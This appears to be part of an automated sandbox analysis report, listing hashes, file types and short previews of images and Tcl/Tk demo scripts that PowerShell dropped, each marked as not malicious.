                                                                                                                                                                                                                      SHA-256:C2DA473E55D8317BD1F983638ADB729BFF1461DE590D76F99D8B3430C71E0F6E
                                                                                                                                                                                                                      SHA-512:FBE2B0C4E8FE413E840884E706D13764218677E0249EAFA25252C2045F5F17ED69B98E6C0D49F55E3E7EC382FDE388A9EC785423FB6D5A35B47726288AF39AD8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:GIF87a@..........I$..I....mI.m..m$.......m..m..I.........m$.........$...mIIm.$m....m$.....mI$...$m...I.$I...mI$..mmI..II.$$.....mm.....I$.$..$.....I.m$$.II......I..I.I...mm..m......mm.$$m....$...m....m.............m.$mm.....II$ImI..I..m.....$I............$..I..m$.mII.I..mm..mm.m.....$.....I$........I.I..I$$.m$$.$I.m..m..m..m..m......m........mI.$..m....Im.m....$.$$.I$$.$$I$$m$II$mm$m.$.m$..I.$I$II$.I$.II.IIIIm$ImII..I..mm$mmImm.m.Im.....Im.I.m..m..I....m..m...m........$I.I..I$.....$..I........................................................................................................................................................................................................................................................................,....@...@......H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*].....&H.@....W.J.....1.P..`....PL.t.... .\...A..."..;._.*...Kx.....Sl.WG........V...E.j7....&t8.....o8.`...../..;'.Y.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:xbm image (48x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1913
                                                                                                                                                                                                                      Entropy (8bit):3.0286949866638806
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:HeBY/hLZvkzgkwBL/vEEk4LOaSIzamWXgv2eLmKqZcn:7DvkzgLVOhNmW4LTn
                                                                                                                                                                                                                      MD5:7278050E8B163B1523D9CBE7DB8BB172
                                                                                                                                                                                                                      SHA1:1EB2A328B36FFBBD8C7AEDC4ECBA50440645A136
                                                                                                                                                                                                                      SHA-256:70AB05927C40337B1D9A8FC15EDC220BA4482D8C886F26B0F5C306071E06851D
                                                                                                                                                                                                                      SHA-512:7E6689455B42A089738D5D228BF554574BEDB4D69EBBE8F38A808F4819D40C540E5DD79AB04EE0A81C27FAFA93D98CCDE34E09FE8EF2C7D072FA315A03CD0424
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#define flagdown_width 48..#define flagdown_height 48..static char flagdown_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1e, 0x00, 0x00,.. 0x00, 0x00, 0x80, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xe0, 0xe1, 0x00, 0x00,.. 0x00, 0x00, 0x70, 0x80, 0x01, 0x00, 0x00, 0x00, 0x18, 0x00, 0x03, 0x00,.. 0x00, 0x00, 0x0c, 0x00, 0x03, 0x00, 0x00, 0x00, 0x06, 0x00, 0x06, 0x04,.. 0x00, 0x00, 0x03, 0x00, 0x06, 0x06, 0x00, 0x80, 0x01, 0x00, 0x06, 0x07,.. 0x00, 0xc0, 0x1f, 0x00, 0x87, 0x07, 0x00, 0xe0, 0x7f, 0x80, 0xc7, 0x07,.. 0x00, 0x70, 0xe0, 0xc0, 0xe5, 0x07, 0x00, 0x38, 0x80, 0xe1, 0x74, 0x07,.. 0x00, 0x18, 0x80, 0x71, 0x3c, 0x07, 0x00, 0x0c, 0x00, 0x3b, 0x1e, 0x03,.. 0x00, 0x0c, 0x00, 0x1f, 0x0f, 0x00, 0x00, 0x86, 0x1f, 0x8e, 0x07, 0x00,.. 0x00, 0x06, 0x06, 0xc6, 0x05, 0x00, 0x00, 0x06, 0x00, 0xc6, 0x05, 0x00,.. 0x00, 0x06, 0x00, 0xc6, 0x04, 0x00, 0x00, 0x06, 0x00, 0x06, 0x04, 0x00,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:xbm image (48x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1907
                                                                                                                                                                                                                      Entropy (8bit):3.234665811172489
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:DFDGgsjVIGnAwfcovZYKgprgpV/gpiBgphBgphBgpwgpAgp8:DFYOGn3fcA2KgBgTgIg5g5gqgCg2
                                                                                                                                                                                                                      MD5:3EA3DDACBA2A3C331C05B2092A113390
                                                                                                                                                                                                                      SHA1:C96D0131CEB77C729CEC652B41395993A63C5762
                                                                                                                                                                                                                      SHA-256:3D3D30B674EEF51449465D387700BF8608931DB54F67A93E015B9A4042F1E29C
                                                                                                                                                                                                                      SHA-512:9F3E8AAA788528F02EF8DCB2558840BD1048FFFEBC25F60676621148DBD671A92B202D72E2176D60FEB49C2509EB35ECC303A3510C9374304F9F7FD1E1ABF1E4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#define flagup_width 48..#define flagup_height 48..static char flagup_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x7f, 0x00,.. 0x00, 0x00, 0x00, 0xe0, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xef, 0x6a, 0x00,.. 0x00, 0x00, 0xc0, 0x7b, 0x75, 0x00, 0x00, 0x00, 0xe0, 0xe0, 0x6a, 0x00,.. 0x00, 0x00, 0x30, 0x60, 0x75, 0x00, 0x00, 0x00, 0x18, 0xe0, 0x7f, 0x00,.. 0x00, 0x00, 0x0c, 0xe0, 0x7f, 0x00, 0x00, 0x00, 0x06, 0xe0, 0x04, 0x00,.. 0x00, 0x00, 0x03, 0xe0, 0x04, 0x00, 0x00, 0x80, 0x01, 0xe0, 0x06, 0x00,.. 0x00, 0xc0, 0x1f, 0xe0, 0x07, 0x00, 0x00, 0xe0, 0x7f, 0xe0, 0x07, 0x00,.. 0x00, 0x70, 0xe0, 0xe0, 0x05, 0x00, 0x00, 0x38, 0x80, 0xe1, 0x04, 0x00,.. 0x00, 0x18, 0x80, 0xf1, 0x04, 0x00, 0x00, 0x0c, 0x00, 0xfb, 0x04, 0x00,.. 0x00, 0x0c, 0x00, 0xff, 0x04, 0x00, 0x00, 0x86, 0x1f, 0xee, 0x04, 0x00,.. 0x00, 0x06, 0x06, 0xe6, 0x04, 0x00, 0x00, 0x06, 0x00, 0xe6, 0x04, 0x00,.. 0x00, 0x06, 0x00, 0xe6, 0x04, 0x00, 0x00, 0x06, 0x00, 0x66, 0x04, 0x00,.. 0x7
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):281
                                                                                                                                                                                                                      Entropy (8bit):3.8816103052848567
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:HeA4Y6orM04rDA9xfHWAdDdRxdDdRxdDdRu2AdDdRxdDdRxdDdRu2AdDdRxdDdRc:HeH9aUr2BhBhBSBhBhBSBhB6
                                                                                                                                                                                                                      MD5:B693523F1FC9C0B2586BDF2463B1A059
                                                                                                                                                                                                                      SHA1:BC83E9DAB35B43955F24A309CF9E9C6CFA4632A9
                                                                                                                                                                                                                      SHA-256:B637798957ED022067685E95C95E8C5E12C27B3443DE3A8E5AA3EE0BB583BC28
                                                                                                                                                                                                                      SHA-512:DBA3C8E8E91D07DC40BD569FAD7BD40DF722638E2F425A7260487AC11BD693573CA4D68F9216F37483E5AB0A53F6179B9CE5272B7928FE828D75CCA242466257
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#define grey_width 16..#define grey_height 16..static char grey_bits[] = {.. 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44,.. 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44,.. 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44};..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:xbm image (48x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1910
                                                                                                                                                                                                                      Entropy (8bit):2.8330270376945546
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:HeTOdOMv2vUfA9pjL8RRjLeTHRxdpT9GzLi1:vOMvFf+L8PLedxdpTsa1
                                                                                                                                                                                                                      MD5:08C2B0ED66328FA653576E7098A9A52C
                                                                                                                                                                                                                      SHA1:0712F97C049789E71952F82491D7C41D9D33E559
                                                                                                                                                                                                                      SHA-256:E82E3B9655519682ACE59D217A004141DEA420B5ACB8ECA08682066895855740
                                                                                                                                                                                                                      SHA-512:1DB41785C5805CE4197D44F39439357E9801446E0FE7FCBA5550AC7C666B02B14555D04D00DE0BD73D74134FE6062338CAF545B1F8DBD59C51F38DBE152E9137
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#define letters_width 48..#define letters_height 48..static char letters_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,.. 0x00, 0xfe, 0xff, 0xff, 0xff, 0x3f, 0x00, 0x02, 0x00, 0x00, 0x00, 0x20,.. 0x00, 0xfa, 0x00, 0x00, 0x00, 0x2e, 0x00, 0x02, 0x00, 0x00, 0x00, 0x2a,.. 0x00, 0x3a, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x02, 0x00, 0x00, 0x00, 0x2e,.. 0xe0, 0xff, 0xff, 0xff, 0xff, 0x21, 0x20, 0x00, 0x00, 0x00, 0x00, 0x21,.. 0xa0, 0x03, 0x00, 0x00, 0x70, 0x21, 0x20, 0x00, 0x00, 0x00, 0x50, 0x21,.. 0xa0, 0x1f, 0x00, 0x00, 0x50, 0x21, 0x20, 0x00, 0x00, 0x00, 0x70, 0x21,.. 0xfe, 0xff, 0xff, 0xff, 0x0f, 0x21, 0x02, 0x00, 0x00, 0x00, 0x08, 0x21,.. 0xfa, 0x01, 0x00, 0x80, 0x0b, 0x21, 0x02, 0x00, 0x00, 0x80, 0x0a, 0x21,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:xbm image (48x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1916
                                                                                                                                                                                                                      Entropy (8bit):3.083287991630834
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:MvAPlMySoWGAE+xrCt4LZSHsj1NrrP10Wom/M6:bN/SoWGAEl4LcMj1X0/m/M6
                                                                                                                                                                                                                      MD5:E3921BE65C66A2302A6A3D7DF553E70C
                                                                                                                                                                                                                      SHA1:3BCFEBFDE2B0138FAC1BFBF40E2E90FE2959CA07
                                                                                                                                                                                                                      SHA-256:C6AF489117974F9C43B681E340E0A25B7F0F97B7F615E8CB3062C26A3FB7B40E
                                                                                                                                                                                                                      SHA-512:0922DF102ACE6E2E7EC4291558311B694850C08418990898EE7BAE7EC0B715416A3BC411DCB6A3E8E0F0C9F0DBB5626B4631D2EA0D9BCAF385A0B418C655396B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#define noletters_width 48..#define noletters_height 48..static char noletters_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x1f, 0x00, 0x00,.. 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xc0, 0xff, 0xff, 0x07, 0x00,.. 0x00, 0xf0, 0x0f, 0xe0, 0x1f, 0x00, 0x00, 0xfc, 0x01, 0x00, 0x7f, 0x00,.. 0x00, 0x3e, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x1f, 0x00, 0x00, 0xf0, 0x01,.. 0x80, 0x07, 0x00, 0x00, 0xc0, 0x03, 0xc0, 0x03, 0x00, 0x00, 0xe0, 0x07,.. 0xe0, 0x01, 0x00, 0x00, 0xf0, 0x0f, 0xe0, 0x00, 0x00, 0x00, 0x78, 0x0e,.. 0xf0, 0x00, 0x00, 0x00, 0x3c, 0x1e, 0x70, 0x00, 0x00, 0x00, 0x1e, 0x1c,.. 0x38, 0x00, 0x00, 0x00, 0x0f, 0x38, 0x38, 0x00, 0x00, 0x80, 0x07, 0x38,.. 0x3c, 0xfc, 0xff, 0xff, 0x7f, 0x78, 0x1c, 0x04, 0x00, 0xe0, 0x41, 0x70,.. 0x1c, 0x04, 0x00, 0xf0, 0x40, 0x70, 0x1c, 0x74, 0x00, 0x78, 0x4e, 0x70,.. 0x0e, 0x04, 0x00, 0x3c, 0x4a, 0xe0, 0x0e, 0x74, 0x03, 0x1e, 0x4a, 0xe0,.. 0x0e, 0x04, 0x00, 0x0f, 0x4e, 0xe0, 0x0e, 0x04, 0x80, 0x07, 0x40, 0xe0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PNG image data, 142 x 181, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):54257
                                                                                                                                                                                                                      Entropy (8bit):7.991045559202111
                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                      SSDEEP:1536:PydSJF70wHfDRh+IEInwOY8MzOijsoneFSi4L:6dSJZ/t1EvOLuOijs7Fw
                                                                                                                                                                                                                      MD5:FE7DC3E7562C55EFDBC7B18DB0924D26
                                                                                                                                                                                                                      SHA1:AD5C5F68C5C384FB29316406CFDD56F33F85F1D1
                                                                                                                                                                                                                      SHA-256:A2FE354DFCB09B9EEB488128F4AC0B498766FAF4A8BECF65BBCD779BDB9C4C8F
                                                                                                                                                                                                                      SHA-512:DF0F56B6F8C457A295A88B9051E1197C7B4B41F7C11C8845CAEB00ED354A24BE1FEA61BD7F51F6D4A33930A60699FEFD1CCDC602AD3BC123C5A44B4035B33108
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR.............."P1...FiCCPICC Profile..x..XwT.K..Y...Y@..%g.Er.KNJPrfIK... A$......H...*.. &@ET. AD.7.z...;...^.....UUOW...............!..Z.c..1.7......F... Mss.L...s.f.mD.h._H.&.........f...A....#.A...M.n...0...x...6..aL.u.......q...Q.5.d.xw.<..y...{....D...n.0.............nA!.../........<...3l...Y.....m...G&.....@m.?.U.......r... j-.H'..V..].`'goo....N..$..t......s...........[....1.. ..C...$.HK.Z.".:./.&:y.O.4.".tvg...jn:.7L3....@......K..b.."..Ve.e...N.......)G;T6...4*5'.Yup.)z..?..N...MV.0....R.!...p.'.....Z.wO...p.tet.v..x.....S.........L....$(...;D.G.FeE_.i..{.?sj3..Q..r.i..Y..l*[....iw.K2..;gje.e.e..i....~Q).2.M~u...H.X.B..e.R..+.e../_..0..\..~...z.FMMt..M.['..6..h.j.Cvg.i.....5.../.v....}...~..!.I.......C.G.....'.^.>t...).........f...m.h......:Z..oLzl...g..E..xW9.;!9.<..>..G..Z>%N.>3|~.%.....Y..o.s.s....i.......i,m,7...J...._.....>.g.f..V.v.N.n......%...#...".I....C)..^...E1.....g....8.9...1..|....}...E.E[.)%.%
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):278
                                                                                                                                                                                                                      Entropy (8bit):4.119939076655806
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:HeA2SM6orM020DHxfHn9zkvLJBwAdbtdmdhdLJEWJvZaY9n2:HeHSpaC0LQ1BwsKJj2
                                                                                                                                                                                                                      MD5:4D5A5306C5B45BF2DD34483C481571E9
                                                                                                                                                                                                                      SHA1:CB4D041B4068FA5F472A5F5A600CB52600FDDF00
                                                                                                                                                                                                                      SHA-256:C5DA801FA4ADA674D951E154A4531A17F3201CEE4AF025800D3CCF98DE860CAD
                                                                                                                                                                                                                      SHA-512:83F09D3457C0A63A8DADED9D5EE8E26F764FD8AE4900870A84E2034CE633B27B5EE5028CAC9B5DBBE962462304A1C8F0DB1F2AA35AD369A15221A0C0F3EE9C61
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#define foo_width 16..#define foo_height 16..static char foo_bits[] = {.. 0x60, 0x06, 0x90, 0x09, 0x90, 0x09, 0xb0, 0x0d, 0x4e, 0x72, 0x49, 0x92,.. 0x71, 0x8e, 0x8e, 0x71, 0x8e, 0x71, 0x71, 0x8e, 0x49, 0x92, 0x4e, 0x72,.. 0xb0, 0x0d, 0x90, 0x09, 0x90, 0x09, 0x60, 0x06};..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 68 x 100
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2341
                                                                                                                                                                                                                      Entropy (8bit):6.9734417899888665
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
                                                                                                                                                                                                                      MD5:FF04B357B7AB0A8B573C10C6DA945D6A
                                                                                                                                                                                                                      SHA1:BCB73D8AF2628463A1B955581999C77F09F805B8
                                                                                                                                                                                                                      SHA-256:72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
                                                                                                                                                                                                                      SHA-512:10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......*\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~*].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Netpbm image data, size = 256 x 256, rawbits, pixmap
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):196623
                                                                                                                                                                                                                      Entropy (8bit):6.174884800123863
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:z8xfYZ2Vasi+bDh8vNJo9ZHXAUB76BouxvRV+zwevb9:zgVaD+bDh8LonXAUByFxvVevB
                                                                                                                                                                                                                      MD5:63890ED702E99F27B50BAD505DD81D0E
                                                                                                                                                                                                                      SHA1:C0BCEBBD7198E55822BE80F862308C67449F92BF
                                                                                                                                                                                                                      SHA-256:786F29B88771E439187DD2E86AD4D255DD185E0C1EA3F8C37D21770FD1DF253A
                                                                                                                                                                                                                      SHA-512:7030AE1A5CA6A4E929950EEC0A70C41A14D24231CEC1573B6F24D10E5A728A96C25A164877063DF10AC18ABC605699018445A7339FEADF8B4B910F60D2FF047D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:P6.256 256.255..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with very long lines (376), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10797
                                                                                                                                                                                                                      Entropy (8bit):4.977233877967956
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:JOxVzNFg6FAemaYLDP+Qf5ylrJfP1t0f+BUSf58l/fIdIDJutF1SnKYXAfJ7I2nb:JyVxFPFAemjLPukO+Q9+KYwh7NbhTL8O
                                                                                                                                                                                                                      MD5:C75B383F95291D8F490F544B5C7967CF
                                                                                                                                                                                                                      SHA1:96ECD044B88F582A235102CDD11F587AD6BA9E4C
                                                                                                                                                                                                                      SHA-256:46E7C6342F562E002C08FB0B3C316079A477697D9F10BEA594983FE1D1E71CF8
                                                                                                                                                                                                                      SHA-512:D960A36209132264AE151066E35A9AAE08914B97AF599BA3DAD8176B7199D961D3D2BBD62D85CF6DA40A0F362FA0FF45AC399BED91BCF278DE29CCD8F4CB31D7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# items.tcl --..#..# This demonstration script creates a canvas that displays the..# canvas item types.....if {![info exists widgetDemo]} {.. error "This script should be run from the \"widget\" demo."..}....package require Tk....set w .items..catch {destroy $w}..toplevel $w..wm title $w "Canvas Item Demonstration"..wm iconname $w "Items"..positionWindow $w..set c $w.frame.c....label $w.msg -font $font -wraplength 5i -justify left -text "This window contains a canvas widget with examples of the various kinds of items supported by canvases. The following operations are supported:\n Left-Button drag:\tmoves item under pointer.\n Middle-Button drag:\trepositions view.\n Right-Button drag:\tstrokes out area.\n Ctrl+f:\t\tprints items under area."..pack $w.msg -side top....## See Code / Dismiss buttons..set btns [addSeeDismiss $w.buttons $w]..pack $btns -side bottom -fill x....frame $w.frame..pack $w.frame -side top -fill both -expand yes....canvas $c -scrollregion {0c 0c 30c 24c} -
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8400
                                                                                                                                                                                                                      Entropy (8bit):4.872305743817805
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:dFKJ/NVGt1NCH3KhnHZnV7i6IP+0isnIVIUmVvbWi4sIqpL3xck3E6gw8goVU/NA:/KYHyUhditI+L3xL0wBoVUJ63ewCit
                                                                                                                                                                                                                      MD5:26B62DA74709AACCE5AB1AD531DE978A
                                                                                                                                                                                                                      SHA1:FCE5E60972C03ADF2F9500ABF597D9E379C5E474
                                                                                                                                                                                                                      SHA-256:7DDEEA934B567E8E5BEE08E2A3767DDF40F015AB251BDDD79A841CFEC548E694
                                                                                                                                                                                                                      SHA-512:449FCD4E27F6C4D5F409EEBFEE74378548DEDDB2B8124121DFEE72E7BBACAEE6172BB535A166036B68789F70D57D6CED2C437C5714143041E802C325AD3AC9CD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" ${1+"$@"}....# ixset --..# A nice interface to "xset" to change X server settings..#..# History :..# 91/11/23 : pda@masi.ibp.fr, jt@ratp.fr : design..# 92/08/01 : pda@masi.ibp.fr : cleaning....package require Tk....#..# Button actions..#....proc quit {} {.. destroy ...}....proc ok {} {.. writesettings.. quit..}....proc cancel {} {.. readsettings.. dispsettings.. .buttons.apply configure -state disabled.. .buttons.cancel configure -state disabled..}....proc apply {} {.. writesettings.. .buttons.apply configure -state disabled.. .buttons.cancel configure -state disabled..}....#..# Read current settings..#....proc readsettings {} {.. global kbdrep ;.set kbdrep."on".. global kbdcli ;.set kbdcli.0.. global bellvol ;.set bellvol.100.. global bellpit ;.set bellpit.440.. global belldur ;.set belldur.100.. global mouseacc ;.set mouseacc."3/1".. global mousethr ;.set mousethr.4
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9391
                                                                                                                                                                                                                      Entropy (8bit):4.742079237895183
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:M26ZJk8klzh9oUOCk2YTCHqYpeVRJADASp7lPnqiTvTL/OTaO/:M26ZYzh93YWBcVRODASNdqgvPhg
                                                                                                                                                                                                                      MD5:919BDE5468C187A2F3FC2B4F55AC4203
                                                                                                                                                                                                                      SHA1:F8E16424160D88C3ABB128587C0C3D952705D0B8
                                                                                                                                                                                                                      SHA-256:8B4D0E72F828AD3A5420BF71F05A212EC32BD500C4645CA12A48DEC4E0486A05
                                                                                                                                                                                                                      SHA-512:5809EB325EBD8C364E7E6A371487D1E6C72D1F284C06FBA91301258B11F4A1D10CD29272C905C16D788EDE6E337930D9203595FB6D0D5D40E566B1CED2852779
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Copyright (C) 2008 Pat Thoyts <patthoyts@users.sourceforge.net>..#..#.Calculate a Knight's tour of a chessboard...#..#.This uses Warnsdorff's rule to calculate the next square each..#.time. This specifies that the next square should be the one that..#.has the least number of available moves...#..#.Using this rule it is possible to get to a position where..#.there are no squares available to move into. In this implementation..#.this occurs when the starting square is d6...#..#.To solve this fault an enhancement to the rule is that if we..#.have a choice of squares with an equal score, we should choose..#.the one nearest the edge of the board...#..#.If the call to the Edgemost function is commented out you can see..#.this occur...#..#.You can drag the knight to a specific square to start if you wish...#.If you let it repeat then it will choose random start positions..#.for each new tour.....package require Tk....# Return a list of accessible squares from a given square..proc ValidMoves
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1419
                                                                                                                                                                                                                      Entropy (8bit):4.807272902458817
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:fH14IOBXegXuf5Ke+chz4cJAjLNMw5p0zPp13lBH+KnqCLrfRqJxpcoL+DgIP9qu:dZAXeBBeq42AjRMHLp13lJ+KqwbRqJxM
                                                                                                                                                                                                                      MD5:3F85E8FFEB3AA5BA8C1D1927D14042C5
                                                                                                                                                                                                                      SHA1:3B0D0443FA30CB443852752F9E89479E6B7A0694
                                                                                                                                                                                                                      SHA-256:6334AB83C8E2D2BA95DEBE678D5583BA7C74925E542047A4FE05554E69CF16E9
                                                                                                                                                                                                                      SHA-512:A838E83C2B1DF31B6C9F2B3F6459FE93DBFC2C1658E9FCE0676ABC5D69211CCFFEB389E18A50C1E936AC0E844864F32AED441CD2F40B889CB55C10E3DC8F322D
                                                                                                                                                                                                                      Malicious:false
